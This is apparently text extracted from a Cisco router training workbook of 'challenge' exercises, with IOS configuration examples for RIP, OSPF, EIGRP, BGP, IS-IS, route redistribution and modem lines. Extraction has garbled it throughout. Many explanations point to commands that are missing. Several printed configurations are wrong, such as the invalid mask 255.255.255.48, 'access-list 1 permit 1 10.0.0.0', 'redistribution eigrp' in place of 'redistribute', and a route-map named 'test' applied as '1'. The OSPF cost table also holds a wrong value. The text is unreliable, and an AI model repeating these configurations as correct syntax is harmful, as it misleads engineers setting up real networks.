(config)# hostname washington
End with CNTL/Z.
washington (config)# router igrp 128

washington (config-router)# network 149.91.240.0
washington (config-router)# variance 65
washington (config-router)# timers ?
basic Basic routing protocol update timers
washington (config-router)# timers basic ?
<0-4294967295> Interval between updates
washington (config-router)# timers basic 9 ?
<1-4294967295> Invalid
washington (config-router)# timers basic 9 11 ?
<0-4294967295> Holddown
washington (config-router)# timers basic 9 11 1 ?
<1-4294967295> Flush
washington (config-router)# timers basic 9 11 1 21 ?
washington (config-router)# exit
washington (config)# ip default-network 101.220.22.0

Outline
This challenge involves the configuration of RIP Version 2 with authenticated routing tables.
Objectives
Setup a RIP Version 2.

Define authentication for RIP.
Example
> en
# config t
NetworkSims.com
39

(config-router)# ?
address-family
auto-summary
default
default-information
default-metric
distance
distribute-list
exit
help
input-queue
maximum-paths
neighbor
network
no
offset-list
Add or subtract offset from IGRP or RIP metrics
output-delay
passive-interface
redistribute
protocol
timers
traffic-share
routing updates
version
(config-router)# exit
(config)# key ?
chain
Key-chain management
config-key Set a private configuration key
(config)# key chain ?
WORD Key-chain name
(config)# key chain martin
(config-keychain)# ?
Key-chain configuration commands:
default Set a command to its defaults
exit
Exit from key-chain configuration mode
key
Configure a key
no
(config-keychain)# key ?
<0-2147483647> Key identifier
(config-keychain)# key 1
(config-keychain-key)# key-string officer
(config-keychain-key)# exit
(config-keychain)# exit
(config)# int e0
(config-if)# ip rip authentication ?
key-chain Authentication key-chain
mode
Authentication mode
(config-if)# ip rip authentication key-chain martin
(config-if)# ip rip authentication mode ?
md5
Keyed message digest
text Clear text authentication
(config-if)# ip rip authentication mode md5

NetworkSims.com
40
Outline
This challenge involves the configuration of OSPF.
Objectives
Setup OSPF
Define networks within a given area.
Define OSPF parameters.
Example
> en
# config t
(config)# router ospf ?
<1-65535> Process ID
(config)# router ospf 146
(config-router)# network 211.79.208.0 0.0.0.255 area 0
(config-router)# ?
area
OSPF area parameters
auto-cost
Calculate OSPF interface cost according to bandwidth
capability
Enable specific OSPF feature
compatible
OSPF compatibility list
default
default-information
default-metric
discard-route
Enable or disable discard-route installation
distance
distribute-list
domain-id
OSPF domain-id
domain-tag
OSPF domain-tag
exit
help
ignore
Do not complain about specific event
log-adjacency-changes Log changes in adjacency state
maximum-paths
neighbor
network
no
passive-interface
redistribute
Redistribute information from another routing protocol
router-id
router-id for this OSPF process
summary-address
Configure IP address summaries
timers
traffic-share
(config-router)#area ?
<0-4294967295> OSPF area ID as a decimal value
NetworkSims.com
41
A.B.C.D
OSPF area ID in IP address format
(config-router)#area 0 ?
authentication Enable authentication
default-cost
Set the summary default-cost of a NSSA/stub area
nssa
Specify a NSSA area
range
Summarize routes matching address/mask (border routers only
stub
Specify a stub area
virtual-link
Define a virtual link and its parameters
(config-router)#area 0 range ?
A.B.C.D IP address to match
(config-router)#area 0 range 192.168.64.0 ?
A.B.C.D IP mask for address
(config-router)#area 0 range 192.168.64.0 255.255.255.0
(config)# int e0
(config-if)# ip ospf ?
authentication
Enable authentication
authentication-key
Authentication password (key)
cost
Interface cost
database-filter
Filter OSPF LSA during synchronization and flooding
dead-interval
Interval after which a neighbor is declared dead
demand-circuit
OSPF demand circuit
hello-interval
Time between HELLO packets
message-digest-key
Message digest authentication password (key)
mtu-ignore
Ignores the MTU in DBD packets
network
Network type
priority
Router priority
retransmit-interval Time between retransmitting lost link state
advertisements
transmit-delay
Link state transmit delay
(config-if)# ip ospf hello-interval ?
<1-65535> Seconds
(config-if)# ip ospf hello-interval 26
(config-if)# ip ospf dead-interval 9

Outline
This challenge involves the configuration of BGP
Objectives
Define BGP.
Example
NetworkSims.com
42

Outline
This challenge involves the configuration of IP unnumbered on the serial ports.
Objectives

Borrow an IP address from E0 to S0.
Borrow an IP address from E0 to S1.
Example
> en
# config t
(config)# int e0
(config-if)# no shut
(config-if)# int s0
(config-if)# ip ?
Interface IP configuration subcommands:
access-group
Specify access control for packets
accounting
Enable IP accounting on this interface
address
Set the IP address of an interface
audit
Apply IDS audit name
auth-proxy
Apply authenticaton proxy
authentication
authentication subcommands
bandwidth-percent
Set EIGRP bandwidth limit
bgp
BGP interface commands
broadcast-address
Set the broadcast address of an interface
cef
Cisco Express Fowarding interface commands
cgmp
Enable/disable CGMP
directed-broadcast Enable forwarding of directed broadcasts
dvmrp
DVMRP interface commands
hello-interval
Configures IP-EIGRP hello interval
helper-address
Specify a destination address for UDP broadcasts
hold-time
Configures IP-EIGRP hold time
igmp
IGMP interface commands
inspect
Apply inspect name
irdp
ICMP Router Discovery Protocol
load-sharing
Style of load sharing
mask-reply
Enable sending ICMP Mask Reply messages
mrm
Configure IP Multicast Routing Monitor tester
mroute-cache
Enable switching cache for incoming multicast packets
NetworkSims.com
43
mtu
Set IP Maximum Transmission Unit
multicast
IP multicast interface commands
nat
NAT interface commands
nhrp
NHRP interface subcommands
ospf
OSPF interface commands
pgm
PGM Reliable Transport Protocol
pim
PIM interface commands
policy
Enable policy routing
probe
Enable HP Probe support
proxy-arp
Enable proxy ARP
rarp-server
Enable RARP server for static arp entries
redirects
Enable sending ICMP Redirect messages
rip
Router Information Protocol
route-cache
Enable fast-switching cache for outgoing packets
rsvp
RSVP interface commands
rtp
RTP parameters
sap
Session Advertisement Protocol interface commands
sdr
Session Directory Protocol interface commands
security
DDN IP Security Option
split-horizon
Perform split horizon
summary-address
Perform address summarization
tcp
TCP header compression parameters
unnumbered
Enable IP processing without an explicit address
unreachables
Enable sending ICMP Unreachable messages
verify
Enable per packet validation
vrf
VPN Routing/Forwarding parameters on the interface
wccp
WCCP interface commands
(config-if)# ip unnumbered e0
(config-if)# int s1
(config-if)# ip unnumbered e0

Outline
This challenge involves the configuration of IP directed.
Objectives
Setup IP directed.
Example
> en
# config t
config)# int e0
NetworkSims.com
44

(config-if)# ip ?
access-group
accounting
address
audit
auth-proxy
authentication
bandwidth-percent
bgp
broadcast-address
cef
cgmp
Enable/disable CGMP
dvmrp
hello-interval
helper-address
hold-time
igmp
inspect
Apply inspect name
irdp
load-sharing
mask-reply
mrm
mroute-cache
mtu
multicast
nat
nhrp
ospf
pgm
pim
policy
probe
proxy-arp
Enable proxy ARP
rarp-server
redirects
rip
route-cache
rsvp
rtp
RTP parameters
sap
sdr
security
split-horizon
summary-address
tcp
unnumbered
unreachables
verify
vrf
wccp
(config-if)#ip directed-broadcast
<1-199>
A standard IP access list number
<1300-2699> A standard IP expanded access list number
<cr>
NetworkSims.com
45

Outline
This challenge involves the configuration of the IP forward protocol.
Objectives
Setup an IP forward protocol.
Example
> en
(config)# int e0
(config-if)# exit
(config)# no ip forward-protocol ?
nd
Sun's Network Disk protocol
sdns
Network Security Protocol
spanning-tree Use transparent bridging to flood UDP broadcasts
turbo-flood
Fast flooding of UDP broadcasts
udp
Packets to a specific UDP port
(config)# no ip forward-protocol udp ?
<0-65535>
Port number
biff
Biff (mail notification, comsat, 512)
bootpc
Bootstrap Protocol (BOOTP) client (68)
bootps
Bootstrap Protocol (BOOTP) server (67)
discard
Discard (9)
dnsix
DNSIX security protocol auditing (195)
domain
Domain Name Service (DNS, 53)
echo
Echo (7)
isakmp
Internet Security Association and Key Management Protocol (500)
mobile-ip
Mobile IP registration (434)
nameserver
IEN116 name service (obsolete, 42)
netbios-dgm NetBios datagram service (138)
netbios-ns
NetBios name service (137)
netbios-ss
NetBios session service (139)
ntp
Network Time Protocol (123)
pim-auto-rp PIM Auto-RP (496)
rip
Routing Information Protocol (router, in.routed, 520)
snmp
Simple Network Management Protocol (161)
snmptrap
SNMP Traps (162)
sunrpc
Sun Remote Procedure Call (111)
syslog
System Logger (514)
tacacs
TAC Access Control System (49)
talk
Talk (517)
tftp
Trivial File Transfer Protocol (69)
time
Time (37)
who
Who service (rwho, 513)
NetworkSims.com
46
xdmcp
X Display Manager
(config)# no ip forward-protocol
Control Protocol (177)

udp syslog
udp tacacs
udp ntp

Outline
This challenge involves the configuration of a static route.
Objectives
Setup a static route.
Example
> en
# config t
(config)# int e0
(config-if)# exit
(config)# ip route ?
A.B.C.D Destination prefix
profile Enable IP routing table profile
vrf
Configure static route for a VPN Routing/Forwarding instance
(config)# ip route 188.240.190.0 ?
A.B.C.D Destination prefix mask
(config)# ip route 188.240.190.0 255.255.224.0 ?
(config)# ip route 188.240.190.0 255.255.224.0 101.189.132.9
(config)# ip ?
access-list
Named access-list
accounting-list
Select hosts for which IP accounting information is
kept
accounting-threshold Sets the maximum number of accounting entries
accounting-transits
Sets the maximum number of transit entries
address-pool
Specify default IP address pooling mechanism
alias
Alias an IP address to a TCP port
as-path
BGP autonomous system path filter
audit
Intrusion Detection System
auth-proxy
Authentication Proxy
bgp-community
format for BGP community
bootp
Config BOOTP services
cef
Cisco Express Forwarding
classless
Follow classless routing forwarding rules
community-list
Add a community list entry
default-gateway
Specify default gateway (if not routing IP)
NetworkSims.com
47
default-network
dhcp
dhcp-server
domain-list
domain-lookup
domain-name
dvmrp
extcommunity-list
finger
flow-aggregation
flow-cache
flow-export
forward-protocol
Flags networks as candidates for default routes

Configure DHCP server and relay parameters
Specify address of DHCP server to use
Domain name to complete unqualified host names.
Enable IP Domain Name System hostname translation
Define the default domain name
DVMRP global commands
Add a extended community list entry
finger server
Configure flow aggregation
Configure netflow cache parameters
Specify host/port to send flow statistics
Controls forwarding of physical and directed IP
broadcasts
ftp
FTP configuration commands
gratuitous-arps
Generate gratuitous ARPs for PPP/SLIP peer addresses
host
Add an entry to the ip hostname table
host-routing
Enable host-based routing (proxy ARP and redirect)
hp-host
Enable the HP proxy probe service
http
HTTP server configuration
icmp
ICMP options
inspect
Context-based Access Control Engine
local
Specify local options
mrm
Configure IP Multicast Routing Monitor test parameters
mroute
Configure static multicast routes
msdp
MSDP global commands
multicast
Global IP Multicast Commands
multicast-routing
Enable IP multicast forwarding
name-server
Specify address of name server to use
nat
NAT configuration commands
ospf
OSPF
pgm
pim
PIM global commands
port-map
Port to application mapping (PAM) configuration
commands
prefix-list
Build a prefix list
radius
RADIUS configuration commands
rcmd
Rcmd commands
reflexive-list
Reflexive access list
route
Establish static routes
routing
Enable IP routing
rsvp
Configure static RSVP information
sap
Global IP Multicast SAP Commands
sdr
Global IP Multicast SDR Commands
security
Specify system wide security information
source-route
Process packets with source routing header options
subnet-zero
Allow 'subnet zero' subnets
tacacs
TACACS configuration commands
tcp
Global TCP parameters
telnet
Specify telnet options
tftp
tftp configuration commands
vrf
Configure an IP VPN Routing/Forwarding instance
wccp
Web-Cache Coordination Protocol Commands
(config)# ip default-network 73.162.96.0
(config)# ip route 0.0.0.0 0.0.0.0 101.189.132.12

NetworkSims.com
48
Outline
This challenge involves the configuration of direct broadcasts.
Objectives
Setup direct broadcasts.
Example
> en
# config t
config)# int e0
(config-if)# ip ?
access-group
accounting
address
audit
auth-proxy
authentication
bandwidth-percent
bgp
broadcast-address
cef
cgmp
Enable/disable CGMP
dvmrp
hello-interval
helper-address
hold-time
igmp
inspect
Apply inspect name
irdp
load-sharing
mask-reply
mrm
mroute-cache
mtu
multicast
nat
nhrp
ospf
pgm
pim
policy
probe
proxy-arp
Enable proxy ARP
rarp-server
redirects
rip
NetworkSims.com
49
route-cache
rsvp
rtp
RTP parameters
sap
sdr
security
split-horizon
summary-address
tcp
unnumbered
unreachables
verify
vrf
wccp
<1-199>
<cr>

Outline
This challenge involves the configuration of advanced RIP.
Objectives
Define RIP version.

Define RIP networks.
Define RIP reception on ports.
Example
> en
# config t
(config-router)# no auto-summary
(config)# int e0
(config-if)# ip rip
NetworkSims.com
50
authentication Authentication control

receive
advertisement reception
send
advertisement transmission
v2-broadcast
send ip broadcast v2 update
(config-if)# ip rip receive
version version control
(config-if)# ip rip receive version
1 RIP version 1
2 RIP version 2
<cr>
(config-if)# ip rip receive version 2
1 RIP version 1
<cr>
(config-if)# ip rip receive version 2

Outline
This challenge involves the setup of authenticated routing protocols.
Objectives
Define EIGRP.
Apply MD5 authentication on an interface.
Define the authentication key chain.
Example
# config t
(config)# router eigrp 142
(config-router)# int s0
(config-if)# ip authentication mode eigrp 142 md5
(config-if)# ip authentication key-chain eigrp 142 ann
(config-if)# exit
(config)# key chain ann
(config-keychain-key)# key-string hotel
NetworkSims.com
51

Outline
This challenge involves the configuration of BGP
Objectives
Define BGP.
Example
# config t
(config)# hostname leeds
leeds (config)# router bgp 172
leeds (config-router)# network 205.8.87.0
leeds (config-router)# neighbor 192.168.1.0 remote-as 100
leeds (config-router)# neighbor 192.168.1.0 update-source loopback0
Topology
The basic topology is defined below, where AS1 is connected to E0, AS2 to S0, and AS3 to
S1.
Neighbor1
AS1
e0
s0
AS2
s1
AS3
Neighbor3
Neighbor2
NetworkSims.com
52

Outline
This challenge involves the configuration of BGP for advertising into networks.
Objectives
Define BGP.
Example
# config t
(config)# hostname leeds
leeds (config)# router bgp 172
leeds (config-router)# network 205.8.87.0 ?
backdoor
Specify a BGP backdoor route
mask
Network mask
route-map Route-map to modify the attributes
<cr>
leeds (config-router)# network 205.8.87.0 mask ?
A.B.C.D Network mask
leeds (config-router)# network 205.8.87.0 mask 255.255.255.48
Topology
S1.
NetworkSims.com
53
Neighbor1
AS1
e0
s0
s1
AS2
AS3
Neighbor3
Neighbor2

Outline
This challenge involves the configuration of BGP with a route-map.
Objectives
Define an access-list to map

Define BGP.
Apply route-map to BGP.
Example
# config t
(config)# access-list 1 permit 1 10.0.0.0 0.0.0.255
(config)# route-map test
(config-route-map)# match ip address 1
(config-route-map)# exit
(config)# router bgp 172
(config-router)# neighbor 11.11.11.11 remote-as 300
(config-router)# neighbor 11.11.11.11 route-map 1 out
Topology
S1.
NetworkSims.com
54
Neighbor1
AS1
e0
s0
s1
AS2
AS3
Neighbor3
Neighbor2

Outline
This challenge involves the configuration of BGP to prevent leakage of private AS numbers
into the Internet.
Objectives
Define BGP.
Defines neighbours.
Prevent leakage of private AS numbers.
Example
# config t
(config)# router
(config-router)#
(config-router)#
(config-router)#
bgp 172
neighbor 11.11.11.11 remote-as 64512
neighbor 12.12.12.12 remove-private-as
Explanation
NetworkSims.com
55
There are legal (or public) AS numbers and private ones. A private one can be setup when
connecting to a single provider. These are in the range of 64,512 to 65,535. Thus the
following defines a private AS:
When private AS numbers are assigned, they should not be advertised to the Internet, as
they are not unique. Thus the command:
(config-router)# neighbor 12.12.12.12 remove-private-as
Removes all private AS in the range from 64,512 to 65,535, in the broadcast to 12.12.12.12.
Topology
S1.
Neighbor1
AS1
e0
s0
s1
AS2
AS3
Neighbor3
Neighbor2

Outline
This challenge involves the configuration of BGP for the atomic aggregation attribute.
Objectives
NetworkSims.com
56
Define BGP.
Defines neighbours.
Define aggregate-address.
Example
# config t
(config)# router
(config-router)#
(config-router)#
(config-router)#
(config-router)#
bgp 172
network 160.0.0.0
aggregate-address 160.0.0.0 255.0.0.0
Explanation
With the atomic aggregation attribute, multiple destinations are grouped within a single
update. Thus:
(config-router)# aggregate-address 160.0.0.0 255.0.0.0
means that there are many routes contained, and have been aggregated into a single route.
This will then create a single routing entry in the BGP routing table.
Topology
S1.
Neighbor1
AS1
e0
s0
AS2
s1
AS3
Neighbor3
Neighbor2
NetworkSims.com
57

Outline
This challenge involves the configuration of BGP for a default local-preference.
Objectives
Define BGP.
Defines neighbours.
Define aggregate-address.
Example
# config t
(config)# router
(config-router)#
(config-router)#
(config-router)#
(config-router)#
bgp 172
network 160.0.0.0
bgp default local-preference 100
Explanation
The local preference attribute in BGP is used to give a degree of preference to routes when
comparing them with other routes. Thus:
(config-router)# bgp default local-preference 100
has a higher precedance than the following:

# config t
(config)# router
(config-router)#
(config-router)#
(config-router)#
(config-router)#
bgp 172
network 180.0.0.0
bgp default local-preference 50
Thus routes which are advertised by both these routers, there will be preference for the
route by the router which has a larger value of the local-preference parameter.
Topology
NetworkSims.com
58
S1.
Neighbor1
AS1
e0
s0
s1
AS2
AS3
Neighbor3
Neighbor2

Outline
This challenge involves the configuration of BGP for a default local-preference using a
route-map.
Objectives
Define BGP.
Defines neighbours.
Define local-preference with a route-map.
Example
# config t
NetworkSims.com
59
(config-route-map)# set local-preference 14

(config-router)# route-map test out
Topology
S1.
Neighbor1
AS1
e0
s0
s1
AS2
AS3
Neighbor3
Neighbor2

Outline
This challenge involves the configuration of BGP by setting a metric.
Objectives
Define BGP.
Defines neighbours.
Define a metric within a route-map.
NetworkSims.com
60
Example
# config t
(config-route-map)# set metric 14
(config-router)# neighbor 11.11.11.11 route-map test out
Topology
S1.
Neighbor1
AS1
e0
s0
s1
AS2
AS3
Neighbor3
Neighbor2

Outline
This challenge involves the configuration of BGP for a distribution list.
Objectives
NetworkSims.com
61
Define BGP.
Defines neighbours.
Define a distribution-list.
Example
# config t
(config)# access-list 1 deny 1 10.0.0.0 0.0.0.255
(config)# access-list 1 permit any
(config-router)# neighbor 11.11.11.11 distribute-list 1 out
Explanation
The distribution-list filter option allows the restriction of routing information on routes that
have been learnt. Thus the commands:
will not transmit the 10.0.0.0/24 route information to the neighbor with the address of
11.11.11.11. In the access-list:
(config)# access-list 1 deny 1 10.0.0.0 0.0.0.255
The permit any is required as it would block everything that did not match the first
statement. Thus a permit any is required at the end of the acces-list.
Topology
S1.
NetworkSims.com
62
Neighbor1
AS1
e0
s0
s1
AS2
AS3
Neighbor3
Neighbor2

Outline
This challenge involves the configuration of BGP for a distribution list.
Objectives
Define BGP.
Defines neighbours.
Define a distribution-list.
Example
# config t
(config)# access-list 103 permit ip 10.0.0.0 0.0.0.255 20.0.0.0 0.0.0.255
(config)# access-list 103 deny ip 20.0.0.0 0.0.0.255 30.0.0.0 0.0.0.255
(config)# access-list 103 permit ip any any
NetworkSims.com
63
Topology
S1.
Neighbor1
AS1
e0
s0
s1
AS2
AS3
Neighbor3
Neighbor2

Outline
This challenge involves the configuration of BGP using an ip prefix-list configuration.
Objectives
Define BGP.
Defines neighbours.
Define an ip prefix-list.
Example
NetworkSims.com
64
# config t
(config)# ip prefix-list test deny 0.0.0.0/0
(config)# ip prefix-list test permit 172.16.0.0/16
(config-router)# neighbor 11.11.11.11 prefix-list test out
(config)# exit
# sh ip prefix
ip prefix-list test: 2 entries
seq 5 deny 0.0.0.0/0
seq 10 permit 172.16.0.0/16
Explanation
An ip prefix-list is a good alternative to access-lists, as they provide performance
improvements and great flexibility.
Topology
S1.
Neighbor1
AS1
e0
s0
s1
AS2
AS3
Neighbor3
Neighbor2
NetworkSims.com
65
Outline
This challenge involves the configuration of BGP using an ip prefix-list configuration.
Objectives
Define BGP.
Defines neighbours.
Define an ip prefix-list.
Example
# config t
(config)# ip prefix-list test permit 192.0.0.0/8 le 24
(config)# ip prefix-list test deny 192.0.0.0/8 ge 25
(config-router)# neighbor 11.11.11.11 prefix-list test out
(config)# exit
# sh ip prefix
seq 5 permit 192.0.0.0/8 le 24
seq 10 deny 192.0.0.0/8 ge 25
Explanation
With ip prefix-list, the ge abd ke are used to specify the range for the matched prefixes.
Thus:
(config)# ip prefix-list test permit 192.0.0.0/8 le 24
(config)# ip prefix-list test deny 192.0.0.0/8 ge 25
defines that the following are permitted:

192.0.0.0/8
192.0.0.0/9
192.0.0.0/10
..
192.0.0.0/24
NetworkSims.com
66
and the following are denied:

192.0.0.0/25
192.0.0.0/26
192.0.0.0/27
..
192.0.0.0/32
Notice:
# sh ip prefix
seq 5 permit 192.0.0.0/8 le 24
seq 10 deny 192.0.0.0/8 ge 25
where the sequence number is automatically incremented by five, each entry. The sequence
numbers start from the lowest to the highest.
Topology
S1.
Neighbor1
AS1
e0
s0
AS2
s1
AS3
Neighbor3
Neighbor2
NetworkSims.com
67

Outline
This challenge involves the configuration of BGP for default-originate.
Objectives
Define BGP.
Defines neighbours.
Define the default-originate.
Example
# config t
(config)# router
(config-router)#
(config-router)#
(config-router)#
(config-router)#
bgp 172
neighbor 11.11.11.11 default-originate
network 160.0.0.0
Topology
S1.
Neighbor1
AS1
e0
s0
AS2
s1
AS3
Neighbor3
Neighbor2
NetworkSims.com
68

Outline
This challenge involves the configuration of ISIS.
Objectives
Define ISIS.
Defines the NET.
Applies ISIS on interfaces.
Example
# config t
(config)# router isis
(config-router)# net 49.0001.0000.0000.000a.00
(config-router)# passive-interface loopback2
(config-router)# is-type level-1
(config)# int e0
(config-if)# ip router isis
(config-if)# int s0
(config-if)# int s1
(config-if)# int loopback 2

Outline
This challenge involves the configuration route redistribution for static routes.
NetworkSims.com
69
Objectives
Define RIP.
Define redistribution of static routes.
Define the passive interface.
Define static routes.
Define the default route.
Example
# config t
(config-router)# passive-interface bri0
(config-router)# redistribute static
(config)# ip route 172.168.0.0 255.255.255.0 bri0
(config)# int e0
(config-if)# int s0
The passive interface is typically used in dial-up connections, where constant updates
would require multiple connections, thus a passive interface is defined. For example in
Figure 1, the highlighted device is setup with a static route to a destination. This route is
then redistritubed to other devices, but not the device connected to the BRI as it is a passive
interface, as it is a static link.
# config t
(config-router)# passive-interface bri0
(config-router)# redistribute static
(config)# ip route 172.168.0.0 255.255.255.0 10.0.0.1
(config)# int e0
(config-if)# int s0
192.168.0.1
bri0
192.168.0.2
bri0
Static
route
is redistributed
172.168.0.0/24
Figure 1
NetworkSims.com
70

Outline
This challenge involves the configuration of distribute-lists for RIP in order to define the
routing information that is sent or received.
Objectives
Define RIP.
Define distribution-list and an associated access-list.
Example
# config t
(config-router)# distribute-list 10 out
(config)# access-list 10 deny 10.0.1.0 0.0.0.255
Explanation
The distribute-list is used to define the routing information that a device sends or receives.
For example:
(config-router)# distribute-list 10 out
defines that all the routing information relating to 10.0.1.0/24 will be removed from any
outgoing routing information.
NetworkSims.com
71
Outline
This challenge involves the configuration of distribute-lists for RIP in order to define the
routing information that is sent or received on a given interface.
Objectives
Define RIP.
Define distribution-list for S0, and an associated access-list.
Example
# config t
(config)# int s0
(config-if)# exit
(config-router)# distribute-list 10 out s0
Explanation
For example:
defines that all the routing information relating to 10.0.1.0/24 will be removed from any
outgoing routing information on S0.

Outline
This challenge involves the configuration of a passive interface with EIGRP using a
distribute-list.
NetworkSims.com
72
Objectives
Define EIGRP.
Define distribution-list for S0, and an associated access-list.
Example
# config t
(config)# access-list 10 deny any
Explanation
For example:
defines that all the routes for S0 will be denied for outgoing updates, thus S0 is a passive
interface.

Outline
This challenge involves the creation of policy-based routing.
Objectives
Define access-lists for interesting traffic..

Applies route-maps.
Example
# config t
NetworkSims.com
73
(config)# access-list 5 permit 192.168.0.0 0.0.0.255

(config)# route-map R1 permit 10
(config-route-map)# set interface s0
(config)# int e0
(config-if)# ip policy route-map R1
(config-if)# exit
(config)# int e1
(config-if)# exit
Explanation
The policy-based routing allows traffic to flow from one port to another based on its details.
For example:
and:
(config)# int e0
(config-if)# exit
(config)# int e1
(config-if)# exit
defines that traffic that matches 192.168.0.0 on S0 is routed through E0, and traffic that
matches 172.16.0.0 is routed through E1.

Outline
NetworkSims.com
74
This challenge involves the configuration of two-way route redistribution.

Objectives
Define RIP.
Define redistribution for RIP.
Define EIGRP.
Define redistribution for EIGRP.
Example
# config t
(config)# router
(config-router)#
(config-router)#
(config-router)#
(config)# router
(config-router)#
(config-router)#
rip
network 10.0.0.0
redistribution eigrp 33 metric 2
exit
eigrp 33
network 20.0.0.0
redistribution rip metric 10000 100 255 1 1500

Outline
This challenge involves the configuration of the redistribution of connected routes.
Objectives
Define RIP.
Define EIGRP.
Example
# config t
(config-router)# redistribution eigrp 33 metric 2
NetworkSims.com
75
(config-router)#
(config)# router
(config-router)#
(config-router)#
exit
eigrp 33
network 20.0.0.0
redistribution connected metric 10000 100 255 1 1500

Outline
This challenge involves the configuration of the redistribution of routes using the defaultmetric command.
Objectives
Define RIP.
Define EIGRP.
Example
# config t
(config)# router
(config-router)#
(config-router)#
(config-router)#
(config-router)#
(config-router)#
(config)# router
(config-router)#
(config-router)#
(config-router)#
(config-router)#
rip
network 10.0.0.0
redistribution eigrp 33
redistribute connected
default-metric 2
exit
eigrp 33
network 20.0.0.0
redistribute rip
redistribute static
default-metric 10000 100 255 1 1500

Outline
This challenge involves the configuration of the redistribution of routes.
NetworkSims.com
76
Objectives
Define RIP.
Define OSPF.
Define redistribution for OSPF.
Example
# config t
(config-router)# passive-interface s0
(config-router)# network 20.0.0.0 area 0
(config-router)# redistribute rip subnets
Explanation
The following stops RIP updates into the OSPF connections:
and the following redistributes the all subnet routes:

(config)# router
(config-router)#
(config-router)#
(config-router)#
ospf 33
network 20.0.0.0 area 0
redistribute rip subnets
Without the redistribute rip subnet, would cause OSPF to only redistribute routes that are
not subnetted (which is the default).
NetworkSims.com
77
s0
s1
Area 0

Outline
This challenge involves the configuration of the redistribution of routes for a limited range
of networks.
Objectives
Define RIP.
Define OSPF.
Example
# config t
(config-router)# redistribute rip subnets
(config-router)# distribute-list 10 in rip
Explanation
The access-list of:
NetworkSims.com
78

along with:
(config-router)# distribute-list 10 in rip
allows only the networks from 172.16.1.0 to 172.16.15.0 to be redistributed.
s0
s1
Area 0

Outline
This challenge involves the configuration of the redistribution of routes for OSPF.
Objectives
Define RIP.
Define OSPF.
Example
# config t
NetworkSims.com
79
(config-router)# area 1 range 192.168.1.0 0.0.0.255

Outline
This challenge involves the configuration of OSPF costs.
Objectives
Define OSPF.
Define OSPF costs for S0 and S1.
Define bandwidth requirements on S0 and S1.
Example
# config t
(config)# int s0
(config-if)# ip ospf cost 64
(config-if)# exit
(config)# int s1
(config-if)# exit
Explanation
With OSPF costs are used to determine the best route. This value for an interface, for Cisco
IOS, is:
100,000,000/bandwidth
Thus a 56kbps link has a cost fo 100,000,000/56,000 which is 1,785. A new cost can be defined
with the following:
(config)# int s0
NetworkSims.com
80

(config-if)# exit
which defines a cost of 64 on S0 (where 64 is equivalent to a T1 stream 1.544MBps). The

cost value can thus be used to determine the most desirable route. Along with this the
bandwidth value must be properly set, as most devices will default to a T1 bandwidth.
Tutorial
Complete the following table:
Interface medium
56kbps serial connection
T1 link (1.544Mbps)
E1 link (2.048Mbps)
Ethernet (10Mbps)
Fast Ethernet (100Mbps)
4Mbps Token Ring
16Mbps Token Ring
Cost
1785

Outline
This challenge involves the configuration of OSPF costs for Giga-bit Ethernet links.
Objectives
Define OSPF.
Define OSPF costs for S0 and S1.
Define bandwidth requirements on S0 and S1.
Define the reference bandwidth.
Example
# config t
(config)# int s0
(config-if)# exit
(config)# int s1
(config-if)# exit
NetworkSims.com
81

(config-router)# auto-cost reference-bandwidth 1000
Explanation
With OSPF costs are used to determine the best route. This value for an interface, for Cisco
IOS, is:
100,000,000/bandwidth
Interface medium
56kbps serial connection
T1 link (1.544Mbps)
E1 link (2.048Mbps)
Ethernet (10Mbps)
Fast Ethernet (100Mbps)
4Mbps Token Ring
16Mbps Token Ring
Cost
1785
64
48
10
1
25
10
These costs work well up to 100 MBps, but do not work for bandwidths over this, such as
for Gigabit Ethernet. To adject the reference bandwidth the auto-cost command can be used,
such as:
(config-router)# auto-cost reference-bandwidth 1000
will set the reference bandwidth at 1,000,000,000 bps.

Outline
This challenge involves the configuration of OSPF authentication using an authenticationkey.
Objectives
Define OSPF.
Define OSPF authentication key for S0 and S1.
Apply authentication to OSPF.
Example
NetworkSims.com
82
# config t
(config)# int s0
(config-if)# ip ospf authentication-key test
(config-if)# exit
(config)# int s1
(config-if)# ip ospf authentication-key test
(config-if)# exit
(config-router)# area 0 authentication
Cisco Router Challenge 106a

Outline
This challenge involves the configuration of OSPF authentication using an authenticationkey using a message-digest.
Objectives
Define OSPF.
Define OSPF authentication key for S0 and S1.
Apply authentication to OSPF.
Example
# config t
(config)# int s0
(config-if)# ip ospf message-digest-key 1 md5 0 default1
(config-if)# exit
(config)# int s1
(config-if)# ip ospf message-digest-key 1 md5 0 default1
(config-if)# exit
(config-router)# area 0 authentication message-digest
Cisco Router Challenge 106b

Outline
This challenge involves the configuration of OSPF with a stub area.
Objectives
NetworkSims.com
83
Setup S0 and S1.

Define OSPF with areas.
Define a stub area.
Example
# config t
(config)# router
(config-router)#
(config-router)#
(config-router)#
ospf 33
area 2 stub
Explanation
A stub area is one which has no routes to an external automous network. In the case of:
(config)# router
(config-router)#
(config-router)#
(config-router)#
ospf 33
area 2 stub
area 2 is a stub network (as illustrated in Figure 1).
Stub
area
External
Autonomous
System (AS)
s0
Area 0
s1
Area 2
Figure 1: Stub area

Outline
This challenge involves the configuration of OSPF with a stub area.
NetworkSims.com
84
Objectives
Setup S0 and S1.

Define a totally stubby area.
Example
# config t
(config)# router
(config-router)#
(config-router)#
(config-router)#
ospf 33
area 2 stub no-summary
Explanation
A stub area is one which has no routes to an external automous network. In the case of:
(config)# router
(config-router)#
(config-router)#
(config-router)#
ospf 33
area 2 stub no-summary
area 2 is a totally stubby network (as illustrated in Figure 1).
Stub
area
External
Autonomous
System (AS)
s0
Area 0
s1
Area 2
Figure 1: Stub area

Outline
This challenge involves the configuration of OSPF using NSSA.
NetworkSims.com
85
Objectives
Setup S0 and S1.

Define NSSA.
Example
# config t
(config)# router
(config-router)#
(config-router)#
(config-router)#
NetworkSims.com
ospf 33
area 2 nssa
86
Remote Access

Outline
This challenge involves the configuration of a modem connection.
Objectives
Setup line port.

Define transport protocols.
Define serial parameters.
Example
> en
# config t
Enter configuration commands, one per line. End with CNTL/Z.
(config)# line ?
<0-10>
First Line number
aux
Auxiliary line
console Primary terminal line
tty
Terminal controller
vty
Virtual terminal
(config)# line 3
(config-line)# transport ?
input
Define which protocols to use when connecting to the terminal
server
output
Define which protocols to use for outgoing connections
preferred Specify the preferred protocol to use
(config-line)# transport input ?
all
All protocols
none
No protocols
pad
X.3 PAD
rlogin Unix rlogin protocol
telnet TCP/IP Telnet protocol
(config-line)# transport input all
(config-line)# modem ?
CTS-Alarm
Alarm device which only uses CTS for call control
DTR-active
Leave DTR low unless line has an active incoming connection
or EXEC
Dialin
